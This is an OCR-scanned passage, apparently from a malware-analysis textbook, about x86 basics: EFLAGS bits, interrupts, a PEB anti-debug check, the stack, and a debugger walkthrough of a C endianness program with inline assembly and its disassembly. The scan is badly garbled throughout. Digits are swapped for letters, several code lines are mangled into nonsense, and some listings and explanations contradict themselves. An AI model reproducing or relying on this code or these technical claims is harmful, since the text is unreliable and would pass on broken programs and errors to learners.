IsDebuggerPresent() Win32 API checks for at 
offset 2 from the index base of 0 of the PEB. 
There are other comparable fields such as 
NtGlobalFlag at offset 0x68, which can be used 
by packers and malware as an anti-debug trick. 
You can see in the screenshot that the field value 
is set to 0x01, which means that the process can 
be aware that it is being debugged if it queries 
this field. Of course, this is a very basic 
technique to program and to overcome and is a 
feature of Windows by default. 


RFLAGS”«EFLAGS FLAGS 





64 bit registers 
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32 bit registers 





16 bit registers 








The EFLAGS register is in the OLlyDbg register 
pane. The cumulative hexadecimal value of the 
EFLAGS register binary pattern is also given as 
0Ox246. 





The RFLAGS, EFLAGS, and FLAGS registers are 
the 64-, 32-, and 16-bit addressed status 
registers. Various important flags used in string 
manipulation instructions and conditional 


construct decision making use these register bit 
fields. The Zero flag, Direction flag, Overflow flag, 
Sign flag, Trap flag, and Carry flag are the most 
used in day-to-day programming. 


The following exhibit is a schematic of the 
EFLAGS register in full detail with the most 
important ones for regular malware analysis. 





The carry flag is set post addition or if borrow 
occurs post subtraction. It is also used to provide 
an alert of error conditions using overflow and 
Carry-in versus carry-out integrity checks that 
mimic the XOR operation on the carry patterns. 


The parity flag is set to 1 for an even number of 
bits in a number. It is used primarily for serial 
interfaces in legacy applications. 


For the zero flag, if the result of an arithmetic or 
logic operation is zero, the flag is set to 1; if not, 
it is set to O. 


The direction flag is mostly used for string 
operations wherein the source and destination 
registers are incremented if the flag is set to 0. If 
it is set to 1, the direction is reversed. 


The overflow flag is used to indicate overflow for 
signed arithmetic. Unsigned arithmetic 
operations do not make use of the overflow flag. 


The trap flag is used for hardware debugging 
support and debugging registers provided on the 
microprocessor. This is used in single-stepping, 
and even breakpoint management internally, as 
the debugger has to keep track of when a 
breakpoint is hit and then insert the OxCC 
opcode using Win32 APIs such as 
ReadProcessMemory() and 
WriteProcessMemory(). This is a TYPE 1 
interrupt. 


An interrupt can be described as a hardware- or 
software-specific signal—either derived from 
external hardware (an asynchronous event), a 
software-specific instruction (traps), or an internal 
event (divide by zero, software breakpoint, a 
single step trap, and so on). The internal event 
can also be an exception (a condition that needs 
to be handled by the OS or the application 
generating the exception). The exception, if 
correctable, is a fault (for example, a page fault 
generated on paged-out memory pages). Traps 
and faults differ in where execution resumes, as 
in the case of faults, the instruction is re- 
executed so that the second time around, the 
fault does not occur, whereas in traps, the next 
instruction from the trigger instruction is where 
the execution resumes. Exception handlers are 
the mechanism and provision by which the OS 
deals with such conditions. 


Since we are dealing mainly with protected-mode 
CPU operation, the IDT (which stands for 
Interrupt Descriptor Table), is a CPU data 
structure constructed during the booting phase, 
which consists of 256 entries of 8 bytes each 
that map to individual interrupt routines. The INT 
instruction takes a numeric operand from 0x00 
to OxFF. INT 3 and INT 1(0xF1) are the only single 
opcode interrupt instructions with the others 
being 2 bytes long (OxCD OxXX). You could use 
the O0xCD 0x3 opcode for INT 3, as well as 
substitute the interrupt number after OxCD to 
get a 2-byte representation for each of the 
interrupts. 


The resume flag is used to resume the execution 
during a debugging session. 


Memory addressing is a more important feature 
to understand at this stage as instructions and 
minutiae can be studied from the disassembly of 
a program or by examining the assembly code 
inside a debugger. 


Much of memory addressing and other details 
will be covered in the chapters ahead, but here 
are three important points to remember when 
writing assembly programs: 


- Memory-to-memory data transfer is not permitted and 
can only be done via a register. 


- An immediate value is a value encoded in the opcode 
sequence itself. 


e Contiguous and conjugate data types such as arrays and 
structs are addressed using an SIB (which stands for 
Scale, Index, Base) scheme, as in Base + Scale * Index. 
Displacement can also be a factor, as in Base + Scale * 
Index + Displacement. 


The initiation ritual 


Think of assembly language as an arcane text on 
a stone tablet from an ancient civilization that 
holds the secret to the fight against evil ghosts in 
the machine. As you might imagine, before 
incanting any of your own creations, you first 
have to understand the alphabet symbols and 
essential vocabulary of this language. Once you 
learn to decipher the existing codes, you can be 
confident about understanding the semantics of 
what is already written. Thereafter, etching your 
own ideas will require more investment of your 
time to understand the nuances of this language 
and that will happen only when you start writing 
in code. A little goes a long way, and getting 
your hands dirty is the primary way that learning 
can occur. 


Let's write a basic console-based C program in 
Visual Studio C++ 2008 Express Edition, which is 
a free download from Microsoft, and compile it. 
Create a new Win32 Console project, type the 
following code in its entirety, and press F5 to run 
it. We will dive straight into understanding the 
code while it is running in a debugger and the 
associated concepts that are paramount to this 
process. Quite a lot of things might be unfamiliar, 
but it's best to get an overall feel before we dive 
into the details, which we will delve into step by 
step: 


1 /*C program to check the endianness of 
the environment on which this program is 
running and display the summation of two 
integers using inline assembler. */ 

2 

3 #include “stdatx.h" 

4 #include <conio.h> // for getch(); 


5 #pragma region DemoProgram 

6 /*Declaration of a custom bool type of 
size 1 byte*/ 

of 

8 #ifndef cplusplus 

9 typedef char bool 

10 #define true 1 

11 #define false 0 

12 #endif 

13 

14 //function definition for endian- 
checking, returns a bool 

15 

16 bool endian chk(int v){ 

il; int * endcheck=&\v; 

18 

19 /*declaration of pointer-to-char 
temp and type casting of an int pointer 
to access the byte value at the address*/ 
20 

21 char * temp=(char *)endcheck; 

22 

23 

24 return *temp ? true:false ; 
25} 

26 

27 int main(int argc, char * argv[]) 
28. 4 

29 allfpfh scour Fash Up 

30 iat: b=7% 

31 ie, £=0% 


32 

33 //declaration of symbolic constants 
for 0 & 1 

34 


35 enum {BIGENDIAN, LITTLEENDIAN}; 
36 


37 

38 bool endianFlag; //instance of bool 
type 

39 

40 //pointer-to-integer,endcheck has 


the value of the address 
//of the variable a 
41 
42 
43 if (endian chk(a)) { f* TUnctioNn 
call with a bool return 


value */ 
44 endianFlag =true; 
45 printf ("%d\n",LITTLEENDIAN) ; 


//using symbolic constants 
//which are integers 
46 printf("Little Endian\n"); 


47 } 


48 else { 

49 endianFlag=false; 

50 printf("%d\n", BIGENDIAN) ; 

aul printf("Big Endian\n"); 

52 } 

53 

54 /*Inline assembler within braces, 


use double underscore (single works too 
on VS 2008) */ 


55 

56 __asm { 

52 

58 mov eax, a; ; copying value at 
address of a to register eax 

59 add eax,b; ; adding the value 
at address of b to eax 

60 mov c, eax ; copying the sum 
total to address of c 

61 

62 } 

63 

64 Printt(-sd\nr . cy: //display 
the value of c 

65 

66 getch(); /* wait for user 


input for commandline display 
persistence */ 

67 return 0; 

68 } 

69 #pragma endregion 


The output would be as follows: 





To familiarize yourself with the various debug 
views and disassembly as well as the register 
and memory views, you need to restart the 
program (Shift+ F5). Put a breakpoint (F9) in the 
IDE left-handside pane. 


Breakpoints appear as red gradient colored balls. 
Their purpose is to halt execution when that line 
of code is executed. 





-]int main(int argc, char * argv[]) 
{ 

int a=1; 

int b-T? 

int c=0; 


wo 
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In VC++ 2008, press A/t+ 8 or go to Debug | 
Windows | Disassembly to open the 
disassembly with the source tab. Press A/t+ 5 
and A/t+ 6 in succession to open the register 
(Debug | Windows | Registers) and memory 
(Debug | Windows | Memory) views. If you 
need more memory views, press Ctr/+ Al/t+ M 
with 2/3/4 (Debug | Windows | Memory) to get 
up to four different memory windows. 


The debug menu contains quite a good set of 
features that enable you to do assembly-level 
and source-level debugging. Let us examine how 
the program executes and watch the code views 
that we are interested in. 


Set the breakpoint right at the outset from the 
starting brace of main (int argc, char * 
argv[]). You can arrange the screen panes to 
accommodate the different views. 








nt main(int ange, char * argu(}) 
{ 
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The VC++ debugger is the tool using which we 
will examine the execution instruction by 
instruction. The main features that we will use for 
this exercise are Step Into (F11) and Step Over 
(F10). For library function calls, we will press F10 
to Step Over the function and reach the next 
instruction, thus saving time so that we don't 
spend time on redundant areas of our compiled 
application. You can always restart the 
debugging process by pressing Ctr/+ Shift+ F5. 
Further, #pragma region <name> and #pragma 
endregion are two directives to Visual Studio to 
enable the grouping of code regions and collapse 
or expand them as needed in the IDE. 


Let us examine the statement excerpts in the 
following disassembly shown; your address 
ranges may be different from this excerpt as the 
Windows loader (the Windows operating system 


code that maps the executable to the process 
memory and executes the main thread) decides 
where to relocate or load the running process. 
Note that the following listings given are in the 
format of <memory address> <hex opcodes> 
<disassembly text>, and on some preceding 
versions of VC++ 2008, the Show Code Bytes 
option is not enabled by default: 


Q0A535A0 55 push ebp 
00A535A1 8B EC mov 

ebp,esp 

00A535A3 81 EC FO 00 00 00 sub 

esp,0FOh 

00A535A9 53 push ebx 
00A535AA 56 push esi 
00A535AB 57 push edi 


O0A535AC 8D BD 10 FF FF FF lea 
edi, [ebp-OFOh] 

00A535B2 B9 3C 00 00 00 mov 
ecx,3Ch 

00A535B7 B8 CC CC CC CC_ mov 
eax, @CCCCCCCCh 

QO0A535BC F3 AB rep stos 
dword ptr es:[edi] 

ineca= 1" 

O0A535BE C7 45 F8 01 00 00 00 mov 
dword ptr [a],1l 

alfaieal oe 

00A535C5 C7 45 EC 07 00 00 00 mov 
dword ptr [b],7 

Ine ¢=0" 

00A535CC C7 45 EO 00 00 00 00 mov 
dword ptr [c],0 


The following instruction sequence is called 
function prologue: 


push ebp 
mov ebp,esp 
sub esp,QFOh 


A function in C/C++ programming borrows from 
mathematical concepts and is a block of code 
delimited within a scope by using curly brackets 


in which an input is processed to provide an 
expected output. In C/C++ programming, such 
functions have the following signature or 
declaration: 


<return type> <function name> 
(parameter(s)<type, identifier>); 


Disassembly text in most disassemblers is 
formatted in the following manner: 


<memory address> <hexadecimal opcodes> 
<instruction> <comments/info> 


Let's now examine the first instruction from the 
preceding listing: 


00A535A0h is the memory address of this 
instruction when it is executed in the user mode 
memory. The address is a 32-bit number as it has 
4 bytes or 8 hexadecimal digits. 


55h is the Intel opcode in hexadecimals for push 
ebp. Opcodes are binary codes for a specific 
instruction as designed by the vendor of the 
microprocessor. Refer to the Intel Software 
Developer's Manual for a detailed description of 
each instruction and its opcodes. 


push epb saves the value in the Extended Base 
Register. This is to persist the value of the current 
stack frame base pointer before building a stack. 
Why you ask? In order to restore the execution 
after entering and exiting a function. To fully 
grasp this you have to understand the stack data 
structure and how Windows exposes system 
memory. A data structure is the method or 
organization of data elements in computer 
memory. Computer memory is abstracted to the 


running program and exposed as data structures 
or storage spaces provided by the operating 
system. The stack and the heap are two 
popularly implemented data structures provided 
by Windows to any user mode program in the 
address space. The stack is like a readily 
available scrapbook for function-related memory 
as, after the function scope is closed, the stack 
frame created for the function is destroyed. A 
heap is dynamically allocated memory for larger 
memory requirements during execution, which is 
normally implemented as doubly linked lists. 
Heaps are an interesting research topic as 
various algorithms are created to make optimum 
use of this data structure without fragmentation 
or performance issues. 


growth direction 
lower addresses 


ESP points to top of stack 







Stack frame 
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4, return value [EBP+4h} 
2, argument 4 [EBP+8h] 
3, argument 2 (EBP+Ch) 





We briefly mentioned that the address of the 
above instruction is a 32-bit number, so 
according to the provisions available in Windows, 
a 32-bit user mode program will have 4 GB of 
memory as its usable area, out of which 2 GB or 
3 GB is used for address extension and the rest 
is used by the Windows kernel. By design, 32-bit 
memory addresses above 0x7FFFFFFF are used 
by Windows. The stack is a LIFO data structure, 
or a Last-in-First-Out data structure, like a spring- 
loaded pistol magazine where the last bullet to 
be loaded gets to exit first. In order to store into 
the allocated space, the top slot needs to move 





down or be pressed by the shooter to reach the 
base so that the first bullet can take its seat. A 
push operation pushes the element inside the 
stack, and a pop operation removes it from the 
stack. Ignore the spring mechanisms of the 
Magazine and understand the process of how 
elements go in and the order in which they come 
out; in the case of stack memory, the values 
already pushed do not slide up and down on 
every push, and thus, every pushed address on 
the stack is static in that sense and a value is 
taken off the stack by using only a pop 
instruction. Another very common analogy is a 
stack of plates, which may be more accessible as 
there is no inter-movement while having the 
same net effect. Similarly, the next instruction 
sets the base to the top of the stack ESP or 
Extended Stack Pointer: 


mov ebp,esp 


This effectively collapses the stack structure at 
the start after which a value that is calculated by 
the compiler is subtracted to allocate space for 
any local variables and related data types: 


sub esp,QFOh 


Subtraction from esp will result in the stack 
growing towards lower memory addresses. 
Adding the value post function scope will collapse 
the stack by moving towards higher addresses: 


push ebx 

push esi 

push edi 

lea edi, [ebp-OFOh] 
mov ecx,3Ch 

mov eax, OCCCCCCCCh 


rep stos dword ptr es:[edi] 


The 3 push instructions store the values in the 
stack by means of pushing the values into the 
stack space just created. The next set of 
instructions are not directly related to the source 
as it is boilerplate code inserted by the compiler 
to manage the buffers and initialize Ox(3C*4) = 
OxFO bytes of memory to dword values of 
OxCCCCCCCC, starting from the stack frame size 
offset from EBP, thus covering the entire 
allocated stack. rep stos or repeat till ecx 
register is not zero and stores string bytes from 
the location at EDI, which is the earlier top of 
stack location (EBP-OFQ). The direction is lower to 
higher addresses by default (this is set in the 
directional flag, or DF, in the ELFAGS register): 


2500 0nk a= 
O0A535BE C7 45 F8 01 00 00 00 mov 
dword ptr [a],1 

Zo ine b=7e 
00A535C5 C7 45 EC 07 00 00 00 mov 
dword ptr [b],7 

27) int ¢=0; 
O0A535CC C7 45 EO 00 00 00 00 mov 
dword ptr [c],0 


Three integer data types are assigned by copying 
immediate values (1,7,0) to their variable 
memory addresses, which are square bracketed 
meaning "at the location" of the address of a. 
The dword ptr directive means that 4 bytes are 
stored at a time (the int data type is 4 bytes in 
Intel processors). The word immediate value 
means that they are a part of the opcode 
sequence. If you look at the opcode patterns, C7 
45 F8 Ol1and C7 45 EC 07, the values 01 and 
07 in hexadecimals are clearly visible. The rest of 
the opcode patterns will be investigated as we 
progress: 


if (endian chk(a)) { 


00A535D3 8B 45 F8 mov 
eax,dword ptr [a] 

00A535D6 50 push eax 
Q0A535D7 E8 FA DB FF FF call 
endian_chk 

O0A535DC 83 C4 04 add 
esp,4 

OO0A535DF OF B6 C8 mOVZx 
ecx,al 

00A535E2 85 C9 test 
ecx,ecx 

00A535E4 74 36 je 


main+7Ch (0A5361Ch) 


Consider the following instruction: 


mov eax,dword ptr [a] 


In this case, the value at the location of the 
variable is copied to the EAX register: 


push eax 


Thereafter, the value is stored on the stack. 


Let us undertake an opcode analysis as a short 
detour to understand the process. The following 
snapshot illustrates the jump thunk table for 
external library functions. In our case, this table 
is created by the linker for the C standard library 
as you might have guessed from the function 
names. The memory addresses change on every 
run; hence, it must be taken as an instance from 
which you can corroborate your live session: 








Address; main(int, char **) 














For this particular run, you can set a breakpoint 
at the call instruction: 


call endian chk () 


Then, press F11 to STEP-IN into the jump thunk 
table to reach an area in memory that is 
displayed by Visual Studio in a similar fashion to 
what was mentioned earlier. You will find that the 
call goes through a thunk table or an import 
gateway. A thunk is a connecting bridge between 
calls to a function address and the actual 
function address. This can be seen in the 
memory window as you can type the address 
0x011511D6 in the memory address box and see 
a series of similar byte patterns for every DWORD 
length. 0xE9 is a byte that recurs every 5 bytes. 
These hexadecimal bytes are instructions for 
unconditional jumps or the jmp instruction. Let us 
examine the opcode sequence at address 
0x11511D6 for the function call to 
endian_chk(). Since @xE9 occurs as the most 
consistent byte value, and going by convention, 


the first opcode can be taken a first glance as the 
main opcode for a jump instruction. The only 
bytes that vary are the two bytes next to OxE9. 
Finally, the last two bytes are also uniformly 0x00 
00. 


OxE9 85 23 00 00 are the 5 bytes in question. 


We can deduce that since the whole list is 
basically a jump list, the opcode length is 5 
bytes. Remember that, by convention, each 
instruction is displayed in its own line and is 
atomic. If you see the jump destination address 
near the function name endian_chk(), it is 
0x1153560. So how is the destination address 
encoded in the opcode sequence you ask? To 
deduce that, let us take the difference between 
the two addresses, namely the current address 
where the EIP points to and the destination 
address where the EIP will be directed. Here, the 
destination address is the larger value; hence, it 
is a positive jump towards higher addresses and 
not a negative jump towards lower addresses. 
Hence, (0x1153560 - 0x11511D6) = Ox238A. 


Now, examine the opcode sequence. Does this 
number occur inside anywhere? You will see that 
the digits 0x85 23 occur in OxE9 85 23 00 OO. 
You might wonder that this looks quite similar to 
Ox 23 8A. The difference value is in bytes, and 
the opcode data types are in little-endian. Hence, 
we read the opcode value 0x85 23 as 0x23 85 
from right to left for a WORD. Take the difference 
again between your deduced value and the value 
shown in the opcode. Thus, (0x238A - 0x2385) 
= 5, which is the length of the opcode sequence. 
So, this opcode encodes the number of bytes to 
transfer control to in a linear address space of the 
process memory for a positive jump direction 


from the address in EIP, adding the length of the 
opcode sequence as the starting point. Thus, the 
distance of 0x2385 bytes is correct. Notice how 
the value is a relative one and not absolute. The 
benefit of having a relative displacement is that if 
the code is relocated in the process memory, the 
distances are still the same. The IA-32 
architecture does not allow direct access 
(read/write) to the EIP register, and if we need to 
find out the current EIP, we can use the code 
sequence in VC++: 


—asm { 
call foo ; foo is a label 
foo: 
pop eax 


} 


4 


Notice the value at the top of the stack (pointed 
to by the ESP register) and the value of the EIP 
register. 























B- & _asm{ 
1 if call foo 
“| foo: 
uy pop eax 
‘ > ic) OO06114A5 58 
a 
Memoy2 Ww AX al Stack 
Address; Ox0099FBDC y {2} "4 
f| 
Ox00S9FBDC BB 28582 00 00 00 00 ¥...... 
Nw 00 00 00 00 00 00 cO ...... A EAX = 00000003 EBX = 7ED8C000 
A dB Tecece cece ce Mlitit EDI = OO099FCAC EIP = 00811445 
Fl ce ce cc ce ce ce ce IIIIIII 








Given our primary deduction from byte lengths, 
the concepts of short jump, near jump, and far 
jump might make sense. A two-byte 
displacement value can provide 2 16 - 1 values, 
which, if taken as a signed number for 
implementing bidirectional jumps (positive and 


negative). Values of -32768 to 32767 will be 
possible either way as signed numbers are 
represented as a 2's complement encoded type. 
If 2 GB is the linear address space that can be 
traversed, two bytes are enough for small 
programs, but longer distances will need a larger 
type. Further, 0x00 00 bytes will be used to 
provide for additional byte ranges as interpreted 
by the compiler for far jumps, which make use of 
the code segment register and the EIP. 


Now, we will resume our program analysis for our 
original address space disassembly listing, here, 
a call instruction to the endian_chk() function, 
which starts at address 0x00a53560. 


Here, the call instruction pushes the address of 
the next instruction in line, so that an RET 
instruction from the function stack while exiting 
from the collapsed stack will return next to the 
current call instruction so that the execution is 
resumed as expected and the control flow is 
maintained. The control is then transferred to the 
endian _chk() function address. 


This function takes one integer value and returns 
BOOL, which is custom typed to be CHAR: 


bool endian chk(int v){ 


00A53560 55 push ebp 
00A53561 8B EC mov 

ebp,esp 

00A53563 81 EC D8 00 00 00 sub 

esp,0D8h 

00A53569 53 push ebx 
00A5356A 56 push esi 
00A5356B 57 push edi 


00A5356C 8D BD 28 FF FF FF lea 
edi, [ebp-0D8h] 

00A53572 B9 36 00 00 00 mov 
ecx, 35h 

QOA53577 Be cl CC CC Ce mov 
eax , @CCCCCCCCh 


Q0A5357C F3 AB rep stos 
dword ptr es:[edi] 
13: int * endcheck=&v; 


00A5357E 8D 45 08 lea 
eax, [v] 
00A53581 89 45 F8 mov 
dword ptr [endcheck] ,eax 

14: 


15: /*declaration of pointer-to-char 
temp and type casting of an int pointer 
to access the byte value at the address*/ 


16: 

17: char * temp=(char *)endcheck; 
00A53584 8B 45 F8 mov 
eax,dword ptr [endcheck] 
00A53587 89 45 EC mov 
dword ptr [temp] ,eax 

18: 

19: 

20: return temp ? true:false ; 
00A5358A 83 7D EC 00 cmp 
dword ptr [temp],0 
00A5358E OF 95 CO setne al 

212) } 


» 


The familiar stack frame prologue is seen. The 
buffer space allocation size is set to the value of 
36h * 4 bytes or OxD8 bytes, which is the stack 
frame's allocated size at the outset. 


Notice how the C pointer declaration and 
assignment are compiled: 


13: int * endcheck=&v; 


00A5357E 8D 45 08 lea 
eax, [v] 
00A53581 89 45 F8 mov 


dword ptr [endcheck] ,eax 


Load Effective Address, or LEA, stores the 
memory address of the source operand [v] to 
the EAX register. The square brackets are not 
meant to deference the address for this particular 
instruction. This is because memory-to-memory 
assignment is not supported by the Intel 
architecture. 


The address at EAX is then copied to the address 
of the endcheck pointer variable of the C type 
int; hence, the full size of the EAX register of 4 
bytes is used: 


17: char * temp=(char *)endcheck; 


00A53584 8B 45 F8 mov 
eax,dword ptr [endcheck] 
00A53587 89 45 EC mov 


dword ptr [temp],eax 


Typecasting the temp pointer to the char variable 
results in copying the memory address of 
endcheck to the address allocated for temp via an 
EAX register: 


20: return temp ? true:false ; 


Q0A5358A 83 7D EC 00 cmp 
dword ptr [temp],0 
QOA5358E OF 95 CO setne al 


A comparison is done for the conditional 
statement by using the cmp instruction, which 
does a non-destructive subtraction and sets the 
Zero flag, or ZF, in the EFLAGS register to 1 if the 
result is 0. Thus, if the value at the temporary 
address after dereferencing (using square 
brackets) is equal to zero, set the value of AL or 
the lower 1 byte of the 16-bit AX register 
(composed of AH and AL) to 1. 


The purpose of this function is to check the 
endianness of the execution environment by 
using an integer input value where the least 
significant byte, or LSB, of the integer input has 
the value of 0x01. Then, if the machine is little- 
endian, the LSB will be stored first at the lower 
address and the bytes will be flipped as the most 
Significant bit or MSB will be stored last. Thus, if 
the flipping did occur, the value at the address 


that is dereferenced of a byte size must have the 
value of 0x01 from the previous assignment. In 

C, any value greater than 0 is true and 0 is false; 
hence, the motivation for using 1 as a test value. 


If the input value is stored in little-endian, the 
byte pattern of the integer value or a DWORD (4 
bytes) will be stored as 0x 01 00 00 OO, whereas 
the actual pattern is Ox 00 00 00 O01. However, if 
the machine word values are stored in the big- 
endian format, then the value returned will be 0 
because the MSB is stored first. This is a well- 
documented technique with ostensible credits to 
SNDAN programmers. 


The rest of the function is the stack frame 
collapsing code and restoration of stored register 
values at the onset of the function prologue. 
Notice now the EBP value is copied to ESP, 
effectively destroying the stack and popping the 
value off to EBP, which will be the saved EBP 
value of the frame of the calling function. Finally, 
RET transfers control to the address at ESP, which 
was Stored earlier when the call to this function 
was made by the caller's call instruction: 


2132} 
00A53591 5F pop edi 
00A53592 5E pop esi 
00A53593 5B pop ebx 
00A53594 8B E5 mov 
esp,ebp 
00A53596 5D pop ebp 
00A53597 C3 ret 


Right after the call instruction, this is the 
instruction that we returned to from endian 
Uchk{ ): 


add esp,4 


The fact that the caller is cleaning the stack 
means that the calling convention used by the 
compiler is the cdecl (C declare) calling 
convention. In this calling convention, the 
arguments are pushed on the stack from right to 
left and the caller has to clean the stack frame. In 
Windows, the stdcall (standard call) calling 
convention is implemented where the 
parameters are pushed from right to left, but the 
callee or the function called cleans the stack by 
using an operand version of RET among other 
approaches. 


In our case, the function takes one integer or 4 
bytes as a parameter; hence, 4 is added to ESP. 
Thus, depending on the data type, the number 
of arguments passed can be calculated by 
dividing the size added to ESP by the size of the 
argument's data type. Other calling conventions 
of note are fastcall and thiscall. fastcall 
takes the first two arguments (left to right) and 
sets them to ECX and EDX and pushes the 
remaining arguments to the stack. thiscall 
takes the this pointer in ECX and behaves just 
like stdcall for the rest. It is good to have a look 
around other compilers as well, such as GCC, 
which have a Slightly different way of doing 
things. Refer to 
https://en.wikipedia.org/wiki/X86_calling_conventi 
ons for more information: 


mMOvzx ecx,al 
test ecx,eCcx 
je main+7Ch 


Here, the byte is zero extended to the ECX 

register, while retaining the value of 1, and ECX 
is checked for the value of 0. If AL has 01h, then 
the leading zero will be copied all the way to the 


left, and therefore, ECX will contain 0x00 00 00 
01. The test instruction does a bitwise AND to 
set the ZF to 1, if 0 is the verdict. Any non-zero 
value will fail the is-equal-to-zero test as AND'ing 
any value with 0 will result in 0, and any bit 
position set to 1 will result in the ZF not being 
set. If the value is O for big-endian, the else 
statement will be executed. 


The value of endianFlag is set to 1. Notice the 
byte ptr directive to reference the address at 
endianFlag up to a data size of 1 byte, where 1 
is copied. The C standard library function called 
printf() is fed a format string for decimal 
output and a newline escape character with the 
enum value LITTLEENDIAN. Notice that the 
compiler replaces the constant identifier for 
LITTLEENDIAN with the immediate value of 1: 


mov byte ptr [endianFlag],1 

Al: printf ("%d\n",LITTLEENDIAN) ; 
mov esi,esp 
push i ; the enum value 
LITTLEENDIAN 
push offset string "%d\n" 
(11B5808h) ; format string 
call dword ptr [__imp_ printf 
(11B82CO0h) ] 
add esp,8 
cmp esi,esp 
call @ILT+315(_ RTC _CheckEsp) 
(11B1140h) 


The two parameters are pushed to stack; the 
enum integer value and the format string offset, 
which is again a 4-byte address. Then, a call is 
made via the jump thunk table (a library function 
call gateway address list or imports). The caller 
clears the stack as 8 bytes are added to ESP; 


recall that the number of arguments pushed is 2, 
and hence, the value is 8 this time: 


mov esi, esp 


and the sequence 


cmp esi,esp 
call @ILT+315(_ RTC CheckEsp) 
(11B1140h) 


Preceding is the stack frame integrity, which are 
implemented as a comparison between the old 
esp value stored earlier in the asm sequence of 
mov esi, esp before the cmp esi, esp 
instruction. So, if the comparison is successful, 
the RTC CheckEsp() function just returns, and 
the execution continues as expected or else it 
carries on with the RTC Failure() function: 


_RTC_CheckEsp: 


00081540 75 01 jne 

esperror (81543h) 

00081542 C3 ret 

esperror: 

00081543 55 push ebp 
00081544 8B EC mov 

ebp,esp 

00081546 83 EC 00 sub 

esp,0 

00081549 50 push eax 
0008154A 52 push edx 
0008154B 53 push ebx 
0008154C 56 push esi 
0008154D 57 push edi 
0008154E 8B 45 04 mov 

eax,dword ptr [ebp+4] 

00081551 6A 00 push 0 
00081553 50 push eax 


00081554 E8 64 FC FF FF_~ call 
RTC_Failure (811BDh) 


00081559 83 C4 08 add 

esp,8 

0008155C 5F pop edi 
0008155D 5E pop esi 


0008155E 5B pop ebx 


0008155F 5A pop edx 


00081560 58 pop eax 
00081561 8B E5 mov 

esp,ebp 

00081563 5D pop ebp 
00081564 C3 ret 

00081565 CC int 3 
00081566 CC int 3 


50: /*Inline assembler within braces, 
use double underscore (single works too 
on VS 2008) */ 

Gala 

52 esa Sina 

53" 

54: mov eax, a; ; copying value at 
address of a to register eax 
011B3650 8B 45 F8 mov 
eax,dword ptr [a] 

55: add eax,b; ; adding the value 
at address of b to eax 
011B3653 03 45 EC add 
eax,dword ptr [b] 

56: mov c, eax ; copying the sum 
total to address of c 
011B3656 89 45 EO mov 
dword ptr [c],eax 

ST 

58: } 


You have used inline assembler or the 
assembly code inserted into and amidst the 
C/C++ code. You use the _ asm keyword along 
with the assembly mnemonics within opening 
and closing braces in individual lines 
(GCC/mingw uses - asm("jmp %eax"); with AT&T 
syntax-prefixing registers with % and immediate 
with $, source before the destination operand 
(the reverse of the Intel syntax) For our 
purposes, we will focus exclusively on the Intel 
syntax that does not follow the described 
peculiarities.). For integer variable value 
summation, we see that the value at the address 
of variable a is copied to the EAX register as 
DWORD. EAX's value is added to the value at the 


address of variable b, whose value is copied from 
EAX to the address of variable c. Notice that the 
compiler has not optimized or removed any 
instruction and kept the instructions as is. 


Something even experienced developers 
sometimes get confused about is operators 
versus functions in a native compiled language 
such as C/C++. The difference between the two 
is that operators are compiled in place by the 
compiler, whereas functions are compiled with a 
separate function prologue and epilogue, as well 
as a Call instruction to the beginning address of 
the function. Observe the C code and the 
disassembled instruction sequence for the 
sizeof() operator: 


typedef struct sequence { 
char * seqname; 
unsigned int range; 
unsigned int fib []; 
}5eq; 


Seq *ptrSeq; 


ptrSeq=(Seq*)malloc(sizeof (Seq) ); 


QQE6142E 8B F4 mov 
esi,esp 
00E61430 6A 08 push 8 


00E61432 FF 15 C8 82 E6 00 call 
dword ptr [imp _ malloc (0E682C8h) ] 


» 


Structs are memory aligned, and padding bytes 
will ensure that 4-byte multiples are used even if 
a single character variable exists in the struct. If 
you use just the uninitialized array unsigned in 
fib[] in the struct, sizeof() will return 1. 


The rest of the code disassembly can be easily 
deciphered at this stage, and you should 
complete it. You have not yet gone over the 
binary format called the Portable Executable 


format, or PE, from Microsoft. All Microsoft 
Windows executables (.exe) including dynamic 
link library files (.dLl), device drivers (.sys), 
screen savers (.Scr), and control panel applets 
(.cpl) share the same format. However, at this 
stage, it is not required as we are focused on 
assembly programming and source code 
disassembly analysis, but this is just an indicator 
of what is ahead. While we have analyzed the 
program in one pass, introducing concepts as we 
progress, assuming you have prior knowledge of 
the essentials such as the stack and register 
types, it might have not made sense if you are 
new to all this. Do not fret; that is exactly what 
the previous paragraphs were acting like a 
screening test for the bare essentials. If you 
understood all of what you just read, then you 
have earned yourself a pat on your back, 
particularly if you are relatively new to malware 
analysis. If not, then please read on and reread 
the code and perform the debugging session 
until each line is clear to you (or most of it, 
excluding the PE format-related parts, as will be 
discussed in later chapters). 


Preparing the alter 


Using the inline assembler in VC++ 2008 is 
simple and convenient enough. However, the 
caveats are that certain conditional commands 
such as .IF, .WHILE, and .REPEAT, as well as 
macros cannot be utilized. Let us look at the 
three described methods of working with 
assembly code with your regular toolkit. Visual 
Studio can be configured to compile assembly 
code using the MASM assembler in the C code. 
The C runtime library can be integrated during 
linking to facilitate this. Create a Win32 project as 
usual and add a new item. 


From the Visual C++ menu, choose the Code and 
CPP file, and name your file with a .asm 
extension. 


Right-click the project name in the Solution 
Explorer, and choose Properties | 
Configuration Properties | Linker | Input. 


Type mscvrt.lib in the Additional 
Dependencies box, and click OK. Then, set 
Ignore All Default Libraries to Yes. 





Configuration: | Active(Debug) v| Platform: ‘Active’? ¥ | Configuration Manager. 


» Common Properties Additional Dependencies msvert.lib 
4 Configuration Properties Ignore All Defaut Libraries Yes (/NODEFAULTLIB) 
General Ignore Speci Library 
Debugging Mocile Defnton Fl 
4 Linker Add Module to Assembly 
Gener Embed Managed Resource File 
Force Symbol References 
vei Delay Loaded DLLs 
Assembly Link Resource 








Debugging 
System 


Optimization 
Embedded IDL 
Advanced 
Command Line 

» Manifest Tool 

» XML Document Generator 

» Browse Information 

» Build Events 

4 Custom Build Step 


General “Additional Dependencies 
| Specifies additional items to add to the link line (ex kernel32.lib); configuration specific, 


[x | | Cancel Apply 


Right-click on the .asm extension assembly file 
and choose Properties. Open Custom Build 
Step | Command Line and type: ml -c -Zi "- 
Fl$ (IntDir)\$ (InputName).lst" "- 

Fo$ (IntDir) \$ (InputName) .obj" 

©$ (InputcPath) *: 























Configuration: Active(Debug) ¥ tom vein) v “Conia Manager. 

















4 Configuration Properties Command Line ml-c-Zi'-Fis(intDir)\$(InputNName) st" "FoS (inti) 
General Description Performing Custom Build Step 


» | Custom Buld Step Outputs §(IntDit\$(inputNlame) ob 
Additional Dependencies 











Command Line 
Species @ command line forthe custom build step, 














[| tnd 





